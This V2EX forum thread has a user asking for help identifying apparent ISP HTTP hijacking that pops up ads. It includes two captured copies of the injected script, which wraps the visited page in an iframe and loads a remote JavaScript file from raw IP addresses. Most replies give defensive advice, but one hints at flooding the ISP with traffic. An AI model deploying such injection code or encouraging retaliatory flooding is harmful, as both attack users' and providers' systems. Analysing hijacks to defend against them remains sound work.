这是不是运营商的 http 劫持广告?

2015-11-25 16:18:30 +08:00
 freep2p

http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydaagksmij213l0lb0x8.jpg
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydaakd9bmj213m0o07bk.jpg
http://ww1.sinaimg.cn/mw690/53aa5cd9jw1eydaapib8jj21380luafl.jpg
http://ww3.sinaimg.cn/mw690/53aa5cd9jw1eydaatwj6aj213p0n8th5.jpg
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydab5hs7lj213n0myadj.jpg
上面这几个图是本机上的。下面的则是虚拟机里的截图
http://ww3.sinaimg.cn/mw690/53aa5cd9jw1eydab3f292j20m80go0vm.jpg
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydab1f8u0j20m80gowgy.jpg
http://ww1.sinaimg.cn/mw690/53aa5cd9jw1eydaaz39z3j20rd0kc79n.jpg
虚拟机中广告的源码, 2 次的。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body style="margin:0px;padding:0px;"><script type="text/javascript">document.write(['<iframe id="r" marginwidth="0" marginheight="0" width="100%" height="',document.documentElement.clientHeight,'" frameborder="0" src="http://www.baidu.com/?_t=1448433264457" scrolling="auto"><','/iframe>'].join(''));var r=document.getElementById('r');r.height=document.documentElement.clientHeight;var a=function(o,e,f){o=o||window.document;if(window.attachEvent){o.attachEvent('on'+e,f);}else{o.addEventListener(e,f,false);}};var i=-1;a(window,'resize',function(){if(i!=-1){clearTimeout(i);i=-1;}i=setTimeout(function(){r.height=document.documentElement.clientHeight;},10);});document.write("<a style='display:none !important' id='_as_anchor_0'></a>");var _as_a={pid:'0',at:0,aw:400,ah:300,au:'http://js001.b0.upaiyun.com/images/1448001994322.jpg',acu:'http://210.209.77.155:82/r?rc=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1&r=http://www.chunshuitang.com/?utm_source=miaoqu&utm_medium=cps&utm_campaign=1120',apu:'http://210.209.77.155:82/r?rp=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1'};(function(){var s=document.createElement('script');var h=document.getElementsByTagName('head')[0];s.src='http://210.209.77.155/pd2.js';s.async=true;s.charset='gbk';if(h)h.insertBefore(s,h.firstChild);})();</script></body></html>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body style="margin:0px;padding:0px;"><script type="text/javascript">document.write(['<iframe id="r" marginwidth="0" marginheight="0" width="100%" height="',document.documentElement.clientHeight,'" frameborder="0" src="http://www.baidu.com/?_t=1448434451251" scrolling="auto"><','/iframe>'].join(''));var r=document.getElementById('r');r.height=document.documentElement.clientHeight;var a=function(o,e,f){o=o||window.document;if(window.attachEvent){o.attachEvent('on'+e,f);}else{o.addEventListener(e,f,false);}};var i=-1;a(window,'resize',function(){if(i!=-1){clearTimeout(i);i=-1;}i=setTimeout(function(){r.height=document.documentElement.clientHeight;},10);});document.write("<a style='display:none !important' id='_as_anchor_0'></a>");var _as_a={pid:'0',at:0,aw:400,ah:300,au:'http://js001.b0.upaiyun.com/images/1448001994322.jpg',acu:'http://123.1.175.216:82/r?rc=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1&r=http://www.chunshuitang.com/?utm_source=miaoqu&utm_medium=cps&utm_campaign=1120',apu:'http://123.1.175.216:82/r?rp=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1'};(function(){var s=document.createElement('script');var h=document.getElementsByTagName('head')[0];s.src='http://123.1.175.216/pd2.js';s.async=true;s.charset='gbk';if(h)h.insertBefore(s,h.firstChild);})();</script></body></html>

求分析,黑龙江联通,家里和公司都是弹这个广告。已经在运营商投诉,没回复呢,心理没谱,想要理直气壮一点。

3111 次点击
所在节点    问与答
21 条回复
alect
2015-11-25 16:21:49 +08:00
初步判断是运营商劫持。。
freep2p
2015-11-25 16:25:17 +08:00
@alect 描述下情况,不是每次都弹,随机性的弹,而且弹几次之后,可能就没有了。
关键 他这个广告太恶心了,成人用品的。要是其它的,弹两次我也就不太在乎了。
而且这几天感觉有点频繁
alect
2015-11-25 16:27:07 +08:00
@freep2p 运营商劫持当然不可能每次都劫持,随机性比较大。有时比较隐蔽
基本上目前喜欢嵌套 iframe 页面,你后头发现可能被劫持的时候查看下源码是否有嵌套 iframe 页面
freep2p
2015-11-25 16:29:34 +08:00





上面这几个图是本机上的。下面的则是虚拟机里的截图




发现图弄小了,第一次发主题。从贴下图网址。
freep2p
2015-11-25 16:38:21 +08:00
@alect 等在抓到弹广告看看吧,我的虚拟机只玩过一款老的网游,挂机用的,按理说,虚拟机里应该是干净的。 是否会有主机的软件能劫持虚拟机弹广告呢? 虚拟机是桥接网络。
eirk2004
2015-11-25 19:25:56 +08:00
freep2p
2015-11-25 19:32:20 +08:00



接到联通客服的回复,“我们检查了你的线路,并没有什么问题”
我表示要投诉到工信部,“那是你的权利” 。无语了
freep2p
2015-11-25 19:46:01 +08:00
@eirk2004 关键不会弄啊,先投诉到工信部吧。不行,就把提供广告的那个服务器屏蔽了。
lanlanlan
2015-11-25 19:48:15 +08:00
蛤蛤蛤 经历过下 apk 下载成腾讯应用宝的 然后 1W 号投诉 那边回复我 “请卸载腾讯所有软件” (手动 88
eirk2004
2015-11-25 19:59:58 +08:00
@freep2p 学一下 wireshark ,入门不难的。可以先用 HTTPNetworkSniffer 这个小工具,找一下触发劫持的 URL
http://blog.jobbole.com/70907/
lhbc
2015-11-25 20:04:24 +08:00
证据并没有卵用
对付运营商的最佳手段是耍无赖
freep2p
2015-11-25 20:31:24 +08:00
@eirk2004 好的,谢谢,劫持不是随机的么,同样一个网页刷新几次就没有了。很难抓住他。
@lanlanlan 难道忍了?
@lhbc 怎样耍无赖啊,天天投诉?估计我电话都进他们黑名单了,拨打 10010 ,客服全忙,欢迎下次再拨,直接挂机,都没有进入等待。
lanlanlan
2015-11-25 20:45:04 +08:00
@freep2p 果断 iptables 封了
lanlanlan
2015-11-25 20:47:38 +08:00
@freep2p 另外不是我教唆哈 如果你手里自有服务器 可以往他们那边送点流量的 至少个人坚定的认为跟流氓讲道理而自己不吃亏的恐怕只有“混混”了
zro
2015-11-25 22:28:40 +08:00
目前在用 ADBLOCK 伺候。。。遇到这种带 JS 要刷新几下
freep2p
2015-11-25 23:30:05 +08:00


抓了包,看教程上说的,这个 ttl 250 id 为 0 明显不是正常的吧。
@eirk2004
@zro 在用 abp ,对这种劫持有用么? 难道是一直在劫持我,只是这个被漏掉了 ?
freep2p
2015-11-25 23:39:59 +08:00
用 wireshark 抓的访问百度的包。那位有工夫,帮讲解分析下,普及下知识。谢过。
http://pan.baidu.com/s/1mgu9lv6
zro
2015-11-26 09:46:49 +08:00
分析它是哪个 DIV ID ,然后 ADB 规则过滤一下,但下次 ADB 拦截会导致整个网页打不开,要刷新一下或几下才行。。
zhangneww
2015-11-26 10:21:07 +08:00
@lanlanlan 我也经历过,酷安,貌似很多人都有下载应用宝的经历。这么恶心真是够了。
zoujun3281
2015-11-26 13:09:31 +08:00
终于能说话了,楼主不用这么麻烦,直接去工信部网站投诉宽带运营商,马上就有客服给你打电话了。自从我投诉完再也没见过这样广告。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/238843

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX